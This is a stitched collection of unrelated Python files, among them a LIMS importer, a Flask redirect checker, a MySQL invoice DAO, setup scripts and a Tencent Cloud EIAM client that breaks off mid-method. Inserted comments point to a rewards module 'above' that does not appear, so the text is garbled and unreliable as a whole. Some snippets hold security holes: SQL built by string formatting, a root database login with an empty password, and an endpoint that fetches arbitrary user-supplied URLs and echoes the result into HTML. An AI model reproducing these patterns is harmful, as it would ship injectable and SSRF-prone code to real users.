"KEY_RIGHT" or char == "\x06" or char == const.A_RIGHT: try: if not (y == len(contents) - 1 and x == len(contents[y])): if x != len(contents[y]): y, x = y, x + 1 else: y, x = y + 1, 0 except Exception: pass # printing the contents to screen stdscr.clear() print_rights(upper_rights) for num, line in enumerate(contents): stdscr.addstr(num, 0, "".join(line)) stdscr.move(y, x) curses.wrapper(main) from jacowvalidator.docutils.styles import check_style_detail STYLES = { 'normal': { 'type': 'Abstract Heading', 'styles': { 'jacow': 'JACoW_Abstract_Heading', 'normal': 'Abstract_Heading', }, 'alignment': None, 'font_size': 12.0, 'space_before': 0.0, 'space_after': 3.0, 'bold': None, 'italic': True, } } EXTRA_RULES = [ "Text must be Abstract", ] HELP_INFO = 'SCEAbsract' def get_abstract_detail(p): abstract_detail = { 'text': p.text, 'original_text': p.text, } return abstract_detail 
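# Referring back to get_table_reward() and get_segment_reward() in
# sigma_graph/envs/figure8/rewards/rewards_simple.py above: with the DEFAULT_REWARDS
# hyper-parameters, the lookups work out as follows (a worked example using only
# values already defined in that module):
#
#   health_lookup (table): damage [0, 1, 2, 3, 4, 100] -> reward [32, 16, 8, 4, 2, 0]
#     damage_taken = 3  -> first damage entry >= 3 is at index 3 -> reward 4
#   faster_lookup (segment): pivot_step=10, reward_init=16, reward_decay=1
#     step = 8   -> not past the pivot              -> reward 16
#     step = 12  -> 16 - (12 - 10) * 1 = 14         -> reward 14
#     step = 40  -> 16 - 30 = -14, clipped at zero  -> reward 0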
def get_abstract_summary(p): style_compare = STYLES['normal'] details = get_abstract_detail(p) details.update(check_style_detail(p, style_compare)) title_style_ok = p.style.name == style_compare['styles']['jacow'] details.update({'title_style_ok': title_style_ok, 'style': p.style.name}) return { 'details': [details], 'rules': STYLES, 'extra_rules': EXTRA_RULES, 'help_info': HELP_INFO, 'title': 'Abstract Heading', 'ok': details['style_ok'], 'message': 'Abstract issues', 'anchor': 'abstract' } def get_abstract_summary_latex(part): if part and part.contents: text = 'Abstract' for i, p in enumerate(part.contents): # make sure abstract has text if not p == '': return {'text': text, 'title': 'Abstract', 'ok': True, 'extra_info': f'Abstract: {text}'} return {'text': '', 'title': 'Abstract', 'ok': False, 'extra_info': f'No Abstract found'} # This sample tests type narrowing of generic constrained types. from typing import AnyStr, Generic, List, Optional, Sequence, TypeVar, Union Command = Union[AnyStr, Sequence[AnyStr]] def version1(cmd: Command) -> List[str]: if isinstance(cmd, bytes): return [str(cmd, "utf-8")] if isinstance(cmd, str): return [cmd] ret: List[str] = [] for itm in cmd: if isinstance(itm, str): ret.append(itm) else: ret.append(str(itm, "utf-8")) return ret T = TypeVar("T", str, int, float, bool) class Item(Generic[T]): value: Optional[T] def __init__(self, source: Optional[T]) -> None: self.value = source def read(self) -> Optional[T]: if self.value is None: raise RuntimeError(f"Item is required!") return self.value hitchdev/hitchqs from hitchqs import commandline import requests class ServerError(Exception): pass # def f1(): # try: # print('1' + 2) # except TypeError as e: # pass # # # f1() def connectServer(): try: req = requests.get("httpxsfafdasfasdf://www.baidu.com") print(req.text) except Exception as e: raise ServerError() connectServer()markfoodyburton/PySysC # # Copyright (c) 2019 -2021 MINRES Technolgies GmbH # # SPDX-License-Identifier: Apache-2.0 # import os.path import logging import cppyy from cppyy import gbl as cpp import pysysc from pysysc.structural import Connection, Module, Signal, Simulation num_of_mem = 100 class TopModule(cpp.scc.PyScModule): def __init__(self, name): super().__init__(self, name) ############################################################################### # instantiate ############################################################################### self.clk_gen = Module(cpp.ClkGen).create("clk_gen") self.rst_gen = Module(cpp.ResetGen).create("rst_gen") self.initiator = Module(cpp.Initiator).create("initiator") self.memories = [Module(cpp.Memory).create("mem%d"%idx) for idx in range(0,num_of_mem)] self.router = Module(cpp.Router[num_of_mem]).create("router") ############################################################################### # connect them ############################################################################### self.clk = Signal("clk").src(self.clk_gen.clk_o).sink(self.initiator.clk_i).sink(self.router.clk_i) [self.clk.sink(m.clk_i) for m in self.memories] self.rst = Signal("rst").src(self.rst_gen.reset_o).sink(self.initiator.reset_i).sink(self.router.reset_i) [self.rst.sink(m.reset_i) for m in self.memories] Connection().src(self.initiator.socket).sink(self.router.target_socket) [Connection().src(self.router.initiator_socket.at(idx)).sink(m.socket) for idx,m in enumerate(self.memories)] super().method("TickMethod", [self.clk.signal.pos_edge()]) def EndOfElaboration(self): print("Elaboration finished") def 
StartOfSimulation(self): print("Simulation started") def EndOfSimulation(self): print("Simulation finished") def TickMethod(self): print("Simulation tick") ############################################################################### # setup and load ############################################################################### logging.basicConfig(level=logging.INFO) build_type='Debug' ############################################################################### #myDir = os.path.dirname( os.path.realpath(__file__)) myDir = os.path.dirname( os.path.realpath(__file__)+'/../../PySysC-SC') pysysc.read_config_from_conan(os.path.join(myDir, 'conanfile.txt'), build_type) pysysc.load_systemc() ############################################################################### logging.debug("Loading SC-Components lib") pysysc.add_include_path(os.path.join(myDir, 'sc-components/incl')) pysysc.add_library('scc.h', os.path.join(myDir, 'build/%s/lib/libsc-components.so'%build_type)) ############################################################################### logging.debug("Loading Components lib") pysysc.add_include_path(os.path.join(myDir, 'components')) pysysc.add_library('components.h', os.path.join(myDir, 'build/%s/lib/libcomponents.so'%build_type)) ############################################################################### # configure ############################################################################### Simulation.setup(logging.root.level) ############################################################################### # instantiate ############################################################################### #from modules import TopModule dut = Module(TopModule).create("dut") ############################################################################### # run if it is standalone ############################################################################### if __name__ == "__main__": Simulation.configure(enable_vcd=False) Simulation.run() logging.debug("Done") 0 """ PANalytical - Omnia Axios XRF """ from bika.lims import bikaMessageFactory as _, t from . import AxiosXrfImporter, AxiosXrfCSVParser, AxiosXrfCSVMultiParser import json import traceback title = "PANalytical - Omnia - Axios XRF" def Import(context, request): """ PANalytical - Omnia Axios_XRF analysis results """ infile = request.form['panalytical_omnia_axios_file'] fileformat = request.form['panalytical_omnia_axios_format'] artoapply = request.form['panalytical_omnia_axios_artoapply'] override = request.form['panalytical_omnia_axios_override'] sample = request.form.get('panalytical_omnia_axios_sample', 'requestid') instrument = request.form.get('panalytical_omnia_axios_instrument', None) errors = [] logs = [] warns = [] # Load the most suitable parser according to file extension/options/etc... 
parser = None if not hasattr(infile, 'filename'): errors.append(_("No file selected")) if fileformat == 'csv': parser = AxiosXrfCSVParser(infile) elif fileformat == 'csv_multi': parser = AxiosXrfCSVMultiParser(infile) else: errors.append(t(_("Unrecognized file format ${file_format}", mapping={"file_format": fileformat}))) if parser: # Load the importer status = ['sample_received', 'attachment_due', 'to_be_verified'] if artoapply == 'received': status = ['sample_received'] elif artoapply == 'received_tobeverified': status = ['sample_received', 'attachment_due', 'to_be_verified'] over = [False, False] if override == 'nooverride': over = [False, False] elif override == 'override': over = [True, False] elif override == 'overrideempty': over = [True, True] sam = ['getRequestID', 'getSampleID', 'getClientSampleID'] if sample == 'requestid': sam = ['getRequestID'] if sample == 'sampleid': sam = ['getSampleID'] elif sample == 'clientsid': sam = ['getClientSampleID'] elif sample == 'sample_clientsid': sam = ['getSampleID', 'getClientSampleID'] importer = AxiosXrfImporter(parser=parser, context=context, idsearchcriteria=sam, allowed_ar_states=status, allowed_analysis_states=None, override=over, instrument_uid=instrument) tbex = '' try: importer.process() except: tbex = traceback.format_exc() errors = importer.errors logs = importer.logs warns = importer.warns if tbex: errors.append(tbex) results = {'errors': errors, 'log': logs, 'warns': warns} return json.dumps(results) Uche Clare/Phase 1/Python Basic 1/Day 11/Task 93.py1-10 print(id(70)) # -*- encoding: utf-8 -*- """ Copyright (c) 2019 - present AppSeed.us """ from django.contrib import admin from django.urls import path, include # add this from django.conf.urls.i18n import i18n_patterns from django.utils.translation import gettext_lazy as _ urlpatterns = [ path(_('admin/'), admin.site.urls), # Django admin route ] urlpatterns += i18n_patterns ( path("", include("authentication.urls")), path("", include("app.urls")), )redirectangular/src/app.py #Import dependencies from flask import Flask, render_template, request import requests #Create instance of Flask App app = Flask(__name__) #Define Route and Content of that page @app.route("/") def home(): return render_template("index.html") @app.route("/detect") def detect_redirects(): url = request.args.get('url') r = requests.get(url) str_response = '' for i, response in enumerate(r.history, 1): print(i, response.url) str_response += str(i) + ' ' + response.url + '
<br>' # print ("redirects to {} with a status code of {} ".format(r.url,r.status_code)) str_response += ("redirects to {} with a status code of {} ".format(r.url,r.status_code)) return str_response #Define route 2 and content #Define route 3 and content #Running and Controlling the script if (__name__ =="__main__"): app.run(host='0.0.0.0', port=5000)theballdredge/certsrvconftest.py import pytest def pytest_addoption(parser): parser.addoption("--adcs", action="store", default='localhost', help="Active Directory Certificates Services server to use") parser.addoption("--username", action="store", help="Username for auth", default="user") parser.addoption("--password", action="store", help="Password for auth", default="password") parser.addoption("--template", action="store", help="Template to use", default="WebServer") parser.addoption("--manual-template", action="store", help="Template with manual approval", default="WebServer_Manual") @pytest.fixture def opt_adcs(request): return request.config.getoption("--adcs") @pytest.fixture def opt_username(request): return request.config.getoption("--username") @pytest.fixture def opt_password(request): return request.config.getoption("--password") @pytest.fixture def opt_template(request): return request.config.getoption("--template") @pytest.fixture def opt_mantemplate(request): return request.config.getoption("--manual-template") 0 from viewdom import html, render def Heading(): return html('

<h1>My Title</h1>') vdom = html('<{Heading} />') # H(tag=, props={}, children=[]) result = render(vdom) # '<h1>My Title</h1>' # end-before expected = '<h1>My Title</h1>
' from webapp1.views.tic_tac_toe.v2 import game_rule # ------- -------------------- --------- # 1 2 3 # 1. Application folder name # 2. Directory name # 3. Python file name, without the extension class JudgeCtrl(): """Judge (referee) control""" def __init__(self, playeq, userCtrl): """Constructor Parameters ---------- playeq: play equipment (the board state) userCtrl: user control """ self._playeq = playeq """Play equipment""" self._userCtrl = userCtrl """User control""" def doNothing(): pass self._onWon = doNothing """Event listeners""" self._onDraw = doNothing def onWon(self, func): """Called when the game is won""" self._onWon = func def onDraw(self, func): """Called when the game is drawn""" self._onDraw = func def doJudge(self, myPiece): """Game-over judgement""" self._playeq.gameoverState = self.makeGameoverState() print(f"[doJudge] gameoverState={self._playeq.gameoverState}") if self._playeq.gameoverState == game_rule.GAMEOVER_WIN: self._onWon(myPiece) elif self._playeq.gameoverState == game_rule.GAMEOVER_DRAW: self._onDraw() elif self._playeq.gameoverState == game_rule.GAMEOVER_LOSE: pass elif self._playeq.gameoverState == game_rule.GAMEOVER_NONE: pass else: raise ValueError( f"Unexpected gameoverState={self._playeq.gameoverState}") def makeGameoverState(self): """Game-over judgement * Note that this evaluates the board right after our own move (i.e. the first position after the turn has passed to the opponent) Returns ------- Game-over state """ print( f"[makeGameoverState] isThere3SamePieces={self._playeq.isThere3SamePieces()}") if self._playeq.isThere3SamePieces(): for squaresOfWinPattern in game_rule.WIN_PATTERN: print( f"[makeGameoverState] self.isPieceInLine(squaresOfWinPattern)={self.isPieceInLine(squaresOfWinPattern)}") if self.isPieceInLine(squaresOfWinPattern): print( f"[makeGameoverState] self._playeq.isMyTurn={self._playeq.isMyTurn}") if self._playeq.isMyTurn: # three in a row was completed on the opponent's move and the turn came back to me: I lose return game_rule.GAMEOVER_LOSE else: # three in a row was completed on my move and the turn passed to the opponent: I win return game_rule.GAMEOVER_WIN if self._playeq.isBoardFill(): # no winner and the board is full: draw return game_rule.GAMEOVER_DRAW # the game is not over yet return game_rule.GAMEOVER_NONE def isPieceInLine(self, squaresOfWinPattern): """Are three of the same pieces lined up? Parameters ---------- squaresOfWinPattern : _type_ a winning pattern (three squares) Returns ------- _type_ True if three pieces are lined up, False otherwise """ return self._playeq.getPieceBySq(squaresOfWinPattern[0]) != game_rule.PC_EMPTY and \ self._playeq.getPieceBySq(squaresOfWinPattern[0]) == self._playeq.getPieceBySq(squaresOfWinPattern[1]) \ and self._playeq.getPieceBySq(squaresOfWinPattern[0]) == self._playeq.getPieceBySq(squaresOfWinPattern[2]) import pymysql from notafiscal import NotaFiscal from cliente import Cliente from tipocliente import TipoCliente class NotaFiscalDao: def __init__(self): self.conexao = pymysql.connect(db = 'nf', user = 'root', passwd = '') self.cursor = self.conexao.cursor() def __del__(self): self.cursor.close() self.conexao.close() def inserir(self, notafiscal : NotaFiscal): self.cursor.execute("INSERT INTO notafiscal (idNotaFiscal, codigo, Cliente_idCliente) VALUES ({}, {}, {})".format(notafiscal._id, notafiscal._codigo, notafiscal._cliente._id)) self.conexao.commit() def consultar(self): self.cursor.execute("SELECT n.idNotaFiscal, n.codigo, c.idCliente, c.nome, c.codigo, c.cnpjcpf, c.tipo FROM notafiscal AS n JOIN cliente AS c ON (c.idCliente = n.Cliente_idCliente)") resultados = self.cursor.fetchall() notas = [] for linha in resultados: notas.append(NotaFiscal(linha[0], linha[1], Cliente(linha[2], linha[3], linha[4], linha[5], TipoCliente.retonar_enum(int(linha[6]))))) return notas def atualizar(self, notafiscal : NotaFiscal): self.cursor.execute("UPDATE notafiscal SET codigo = {}, Cliente_idCliente = {} WHERE idNotaFiscal = {}".format(notafiscal._codigo, notafiscal._cliente._id, notafiscal._id)) self.conexao.commit() def excluir(self, notafiscal : NotaFiscal): self.cursor.execute("DELETE FROM notafiscal WHERE idNotaFiscal = {}".format(notafiscal._id)) self.conexao.commit() def serial(self): self.cursor.execute("SELECT coalesce(MAX(idNotaFiscal), 0) + 1 FROM notafiscal") resultado = self.cursor.fetchone() return int(resultado[0])from pdia.extendedInfoParser.parseJSON import parseJsonDatum def parseMathML(js): """Parse a JSON string, return parsed object without the MathML. The current observable log for MathML includes both the "contentMathML" and a latex field. Here we just want to return the latex. We can simply ignore the `contentMathML`. In the case one needs to translate MathML expressions to latex, use pdia.utils.mml2latex().
:param js: input JSON string :return: parsed dict object without the "contentMathML" part """ res = parseJsonDatum(js) # Now get rid of the MathML try: del res['contentMathML'] except: pass return res import logging import aiohttp log = logging.getLogger(__name__) class CatNip: def __init__(self, client, api_base): self.client = client self.api_base = api_base self.sess = aiohttp.ClientSession() @property def headers(self): return { 'Authorization': f'Bot {self.client._token}' } def _route(self, route): return f'{self.api_base}{route}' async def request(self, verb: str, route: str, payload: dict): """Request a route from the API.""" log.info(f'{verb} request to {route}') async with self.sess.request(verb, self._route(route), json=payload, headers=self.headers) as resp: return resp async def get(self, route, payload=None): """Make a GET request to the API.""" resp = await self.request('GET', route, payload) return await resp.json() async def post(self, route, payload=None): """Make a POST request to the API.""" resp = await self.request('POST', route, payload) return await resp.json() from setuptools import setup, find_packages from os.path import join, abspath, dirname requirements_txt = join(abspath(dirname(__file__)), 'requirements.txt') requirements = [l.strip() for l in open(requirements_txt) if l and not l.startswith('#')] def _translate_req(r): # this>=0.3.2 -> this(>=0.3.2) ops = ('<=', '>=', '==', '<', '>', '!=') _version = None for op in ops: if op in r: r, _version = r.split(op) _version = op + _version req = r if _version: req += '(%s)' % _version return req version = '0.14.dev0' setup( name='EGCG-Core', version=version, packages=find_packages(exclude=('tests',)), url='https://github.com/EdinburghGenomics/EGCG-Core', license='MIT', description='Shared functionality across EGCG projects', long_description='Common modules for use across EGCG projects. 
Includes logging, configuration, common ' 'exceptions, random utility functions, and modules for interfacing with external data ' 'sources such as EGCG\'s reporting app and Clarity LIMS instance', classifiers=[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Healthcare Industry", "Intended Audience :: Science/Research", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.3", "Programming Language :: Python :: 3.4", "Programming Language :: Python :: 3.6", ], keywords='EdinburghGenomics executor notification logging api rest', requires=[_translate_req(r) for r in requirements], # metadata install_requires=requirements, # actual module requirements scripts=['bin/integration_test_runner.py'], zip_safe=False, author='', author_email='' ) import json import pytest @pytest.mark.asyncio async def test_item_search_get_filter_extension_cql( app_client, load_test_data, load_test_collection ): """Test GET search with JSONB query (cql json filter extension)""" test_item = load_test_data("test_item.json") resp = await app_client.post( f"/collections/{test_item['collection']}/items", json=test_item ) assert resp.status_code == 200 # EPSG is a JSONB key params = { "collections": [test_item["collection"]], "filter": { "gt": [ {"property": "proj:epsg"}, test_item["properties"]["proj:epsg"] + 1, ] }, } resp = await app_client.post("/search", json=params) resp_json = resp.json() assert resp.status_code == 200 assert len(resp_json.get("features")) == 0 params = { "collections": [test_item["collection"]], "filter": { "eq": [ {"property": "proj:epsg"}, test_item["properties"]["proj:epsg"], ] }, } resp = await app_client.post("/search", json=params) resp_json = resp.json() assert len(resp.json()["features"]) == 1 assert ( resp_json["features"][0]["properties"]["proj:epsg"] == test_item["properties"]["proj:epsg"] ) frameworks/tensorflow/perf_tests/one_hot.py100-1000 #!/usr/bin/env python3 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. 
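# Referring back to _translate_req() in the EGCG-Core setup.py above: it rewrites a
# pip-style requirement such as 'this>=0.3.2' into the 'this(>=0.3.2)' form expected
# by the `requires` metadata field. A small self-contained sanity check of that
# rewrite (the helper is repeated here only so the check runs standalone; it is not
# part of either surrounding file):
def _translate_req_demo(r):
    ops = ('<=', '>=', '==', '<', '>', '!=')
    _version = None
    for op in ops:
        if op in r:
            r, _version = r.split(op)
            _version = op + _version
    req = r
    if _version:
        req += '(%s)' % _version
    return req

assert _translate_req_demo('this>=0.3.2') == 'this(>=0.3.2)'
assert _translate_req_demo('requests') == 'requests'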
import tensorflow as tf from tensorflow.contrib import antares if tf.version.VERSION.startswith('2.'): tf = tf.compat.v1 tf.disable_eager_execution() from _common import * x = create_variable([1024], dtype=tf.int32) compare_ops( tf.one_hot(x, depth=128), antares.make_op('output0[N, F] = const(1.0).when([input0[N] == F], 0.0) where F in 128', [x]), ) 0 import socket HOST = 'localhost' PORT = 4900 clienteCalc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) pedido = input("Insira a operação que deseja realizar:") byte_msg = pedido.encode('utf-8') clienteCalc.sendto(byte_msg, (HOST, PORT)) modifiedMessage, serverAddress = clienteCalc.recvfrom(2048) #print(result) print(modifiedMessage.decode('utf-8')) clienteCalc.close() i90/config.py # i90/config.py from os import environ from cached_property import cached_property class Config: @cached_property def protocol(self): return environ["MY_PROTOCOL"] @cached_property def host(self): return environ["MY_HOST"] @cached_property def token_byte_length(self): return int(environ.get("TOKEN_BYTE_LENGTH", 16)) @cached_property def stage(self): return environ["STAGE"] @cached_property def dynamo_configuration(self): endpoint = environ.get("DYNAMO_ENDPOINT") if endpoint: return {"endpoint_url": endpoint} return {} @cached_property def redirects_table(self): return environ["REDIRECTS_TABLE"] @cached_property def catchall_redirect(self): return environ.get( "CATCHALL_REDIRECT", "https://www.voteamerica.com/?utm_medium=referral&utm_source=i90&utm_campaign=general-i90&source=va_referral_i90_general-i90" ) @cached_property def tracking_stream(self): return environ["TRACKING_STREAM"] config = Config() setup.py import pathlib import setuptools # The directory containing this file HERE = pathlib.Path(__file__).parent # The text of the README file README = (HERE / "README.md").read_text() # This call to setup() does all the work setuptools.setup( name="rx-scheduler", version="0.0.1", description="Function interval runner based on rxpy and asyncio", long_description=README, long_description_content_type="text/markdown", url="https://github.com/ryazantseff/rxpy-scheduler", author="", author_email="", license="MIT", keywords = ['Scheduler', 'rxpy', 'async'], install_requires=[ 'asyncio', 'rx', ], packages=setuptools.find_packages(), classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Topic :: Software Development :: Build Tools', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], ) tencentcloud/eiam/v20210420/eiam_client.py # -*- coding: utf8 -*- # Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
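# Referring back to the one_hot perf test above: the antares expression
# 'output0[N, F] = const(1.0).when([input0[N] == F], 0.0) where F in 128' builds an
# [N, 128] tensor that is 1.0 where the column index equals the input id and 0.0
# elsewhere, i.e. the same result as tf.one_hot(x, depth=128). The equivalent
# construction in plain NumPy, for illustration only:
import numpy as np
ids = np.array([3, 0, 127], dtype=np.int32)                      # example input ids
one_hot = (np.arange(128) == ids[:, None]).astype(np.float32)    # shape (3, 128)
assert one_hot[0, 3] == 1.0 and one_hot[0, 4] == 0.0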
import json from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException from tencentcloud.common.abstract_client import AbstractClient from tencentcloud.eiam.v20210420 import models class EiamClient(AbstractClient): _apiVersion = '2021-04-20' _endpoint = 'eiam.tencentcloudapi.com' _service = 'eiam' def AddAccountToAccountGroup(self, request): """账号组添加账号 :param request: Request instance for AddAccountToAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.AddAccountToAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.AddAccountToAccountGroupResponse` """ try: params = request._serialize() body = self.call("AddAccountToAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.AddAccountToAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def AddUserToUserGroup(self, request): """加入用户到用户组 :param request: Request instance for AddUserToUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.AddUserToUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.AddUserToUserGroupResponse` """ try: params = request._serialize() body = self.call("AddUserToUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.AddUserToUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateAccountGroup(self, request): """创建账号组 :param request: Request instance for CreateAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateAccountGroupResponse` """ try: params = request._serialize() body = self.call("CreateAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateAppAccount(self, request): """创建应用账号 :param request: Request instance for CreateAppAccount. 
:type request: :class:`tencentcloud.eiam.v20210420.models.CreateAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateAppAccountResponse` """ try: params = request._serialize() body = self.call("CreateAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateOrgNode(self, request): """新建一个机构节点 :param request: Request instance for CreateOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateOrgNodeResponse` """ try: params = request._serialize() body = self.call("CreateOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateUser(self, request): """新建一个用户 :param request: Request instance for CreateUser. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateUserResponse` """ try: params = request._serialize() body = self.call("CreateUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def CreateUserGroup(self, request): """新建用户组 :param request: Request instance for CreateUserGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.CreateUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.CreateUserGroupResponse` """ try: params = request._serialize() body = self.call("CreateUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.CreateUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteAccountGroup(self, request): """删除账号组 :param request: Request instance for DeleteAccountGroup. 
:type request: :class:`tencentcloud.eiam.v20210420.models.DeleteAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteAccountGroupResponse` """ try: params = request._serialize() body = self.call("DeleteAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteAccountGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteAppAccount(self, request): """删除应用账号 :param request: Request instance for DeleteAppAccount. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteAppAccountRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteAppAccountResponse` """ try: params = request._serialize() body = self.call("DeleteAppAccount", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteAppAccountResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteOrgNode(self, request): """删除一个机构节点 :param request: Request instance for DeleteOrgNode. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteOrgNodeRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteOrgNodeResponse` """ try: params = request._serialize() body = self.call("DeleteOrgNode", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteOrgNodeResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUser(self, request): """通过用户名或用户 id 删除用户。 :param request: Request instance for DeleteUser. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUserRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUserResponse` """ try: params = request._serialize() body = self.call("DeleteUser", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUserResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUserGroup(self, request): """删除一个用户组 :param request: Request instance for DeleteUserGroup. 
:type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUserGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUserGroupResponse` """ try: params = request._serialize() body = self.call("DeleteUserGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUserGroupResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DeleteUsers(self, request): """批量删除当前节点下的用户。如果出现个别用户删除错误,将不影响其余被勾选用户被删除的操作,同时提示未被删除的用户名称/用户ID。 :param request: Request instance for DeleteUsers. :type request: :class:`tencentcloud.eiam.v20210420.models.DeleteUsersRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DeleteUsersResponse` """ try: params = request._serialize() body = self.call("DeleteUsers", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DeleteUsersResponse() model._deserialize(response["Response"]) return model else: code = response["Response"]["Error"]["Code"] message = response["Response"]["Error"]["Message"] reqid = response["Response"]["RequestId"] raise TencentCloudSDKException(code, message, reqid) except Exception as e: if isinstance(e, TencentCloudSDKException): raise else: raise TencentCloudSDKException(e.message, e.message) def DescribeAccountGroup(self, request): """查询账号组列表 :param request: Request instance for DescribeAccountGroup. :type request: :class:`tencentcloud.eiam.v20210420.models.DescribeAccountGroupRequest` :rtype: :class:`tencentcloud.eiam.v20210420.models.DescribeAccountGroupResponse` """ try: params = request._serialize() body = self.call("DescribeAccountGroup", params) response = json.loads(body) if "Error" not in response["Response"]: model = models.DescribeAccountGroupResponse() model._deserialize(response["Response"]) return model else: 